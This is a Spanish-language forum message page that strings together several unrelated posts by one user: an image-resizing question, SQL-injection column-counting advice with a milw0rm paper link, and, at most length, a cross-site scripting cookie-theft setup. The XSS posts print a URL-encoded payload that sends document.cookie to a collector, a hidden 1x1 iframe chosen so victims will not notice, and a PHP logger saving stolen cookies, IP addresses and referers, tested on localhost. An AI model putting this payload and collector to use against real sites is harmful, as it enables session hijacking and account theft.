Mensajes

Hola buenas,
Bueno pues tengo una duda,

estoy haciendo una web en la que lo usuarios pueden subir fotos, pero lo que quiero es que se queden todas iguales y a ser posible escribir un mensaje en la imagen (por ejemplo el nombre de la web). Se podría hacer que al subirse ya se redimensine y se guarde?

Si alguién lo ha hecho alguna vez, le agradecería si me podría prestar el código.

Un saludo y gracias de antemano.

Leete algun pequeño doc de MySQL para que veas como va, después puedes leerte ese paper que te pasé, lo entenderás bastante bien.

Un saludo.

Estás utilizando 15 columnas, el error que te tira es porque ay más o menos columnas, vamos que ese numero de columnas no es.

puedes probar un ' order by

leete este paper, lo explica bastante bien: http://www.milw0rm.com/papers/216

Saludos.

yeee

me hize un archivo llamado entra.php con lo que comentaste del iframe:

Código (php) [Seleccionar] Expandir

<?php
$xss = urlencode("<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>");
?>

<html>
<iframe src="http://localhost/xss/vuln.php?vuln=<?=$xss?>" width="1" height="1" frameborder="0"></iframe>
</html>

Al parecer lo del iframe si es buena idea ya que como no ponga un sniffer y vea los request dudo que se de nadie cuenta. Con <img entonces no se puede hacer verdad?

intente:
<img src="http://localhost/xss/vuln.php?vuln=%3Cscript%3Ewindow.location%3D%27http%3A%2F%2Flocalhost%2Fxss%2Fxss.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E">

pero no me envia nada al archivo donde almaceno las cookies, vamos no va al window.location.
Con la librería gd de php se podría hacer que carge una imagen y a la vez haga una petición a la web enviandonos la cookie, no? o esto solo sirve para CSRF?

Un saludo, gracias por las respuestas.

pero tu lo que estás haciendo hay es para que meta en $_COOKIE['x'] el XSS.
Yo lo que quiero es un XSS normal, la sesion nomas la creaba para que document.cookie tendría un valor y poder insertalo a mi archivo donde se guardarán las cookies.

Con el echo $_GET['x']; insertaba el XSS y enviaba a mi registrador de cookies el PHPSESSID.
No se si me entiendes. Aunque tb lo podría haber hecho asi, creo..:

Código (php) [Seleccionar] Expandir


<?php
if(!$_COOKIE['x']){
      setcookie('x', 'test');
}
echo $_GET['vuln'];
?>

Despues haciendo http://localhost/test.php?vuln=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Obtendría: x=test

Saludos.

Pues para hacer pruebas hize esto que es simple y crea una sesión para que me guarde el PHPSESSID:

Código (php) [Seleccionar] Expandir


<?php
/* VULN XSS */
session_start();
$_SESSION['x'] =  true;
echo $_GET['x'];

?>

por cierto que diferencia hay entre una cookie y una sesión?

Saludos y gracias por la ayuda

yo tengo xss.php:

Código (php) [Seleccionar] Expandir

<?php
$archivo = fopen('log.html','a');

$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$re = $_SERVER['HTTP_REFERER'];
$fecha=date("j F, Y, g:i a");

fwrite($archivo, '<hr>Cookie: '.$cookie.'<br>Viene de: '.$re.'<br> IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>

lo que quiero es que al abrir prueba.html que es:

Código (html4strict) [Seleccionar] Expandir

<html>
<head>
<title>PRUEBAS XSS</title>
<body>
<img src="http://localhost/xss/vuln.php?x=<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>">
</body>
</html>

se ejecute el XSS y se me envie a log.html la cookie.
Espero que me entiendan, gracias por las respuestas.

Saludos,

Bueno me he puesto a leer un poco sobre XSS y hacer pruebas en mi localhost, hize un script vulnerable a XSS (vuln.php) y otro que recoge la cookie (xss.php) por la variable 'cookie'.

Entonces si entraría a:
http://localhost/xss/vuln.php?x=<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>

en un archivo llamado log.html se me escribiría la cookie, bien...
No podría meter ese enlace entre etiquetas <img> por ejemplo:

prueba.html
<img src="http://localhost/xss/vuln.php?x=<script>window.location='http://localhost/xss/xss.php?cookie='+document.cookie;</script>">

para que cuando habra prueba.html se envie la petición get con esa url y se guarde la cookie menos sospechosamente?

Intente hacerlo asi y no me rulo, pase la url por urlencode() y tampoco.

Un saludo y gracias de antemano 

Como hariais lo del campo oculto con una sesion?

Saludos y gracias por las respuestas.

Si, lo del bloqueo IP ya lo hize para la administración 
Quiero aprender más metodos para no tener que hacerlo en cualquier formulario...

Nose si alguien conoce lo que digo del <input type="hidden" value="algo aleatorio">
Si me pueden echar una mano, gracias!